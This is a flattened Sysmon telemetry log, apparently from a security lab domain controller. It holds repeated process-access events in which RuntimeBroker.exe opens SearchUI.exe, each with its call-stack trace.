13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 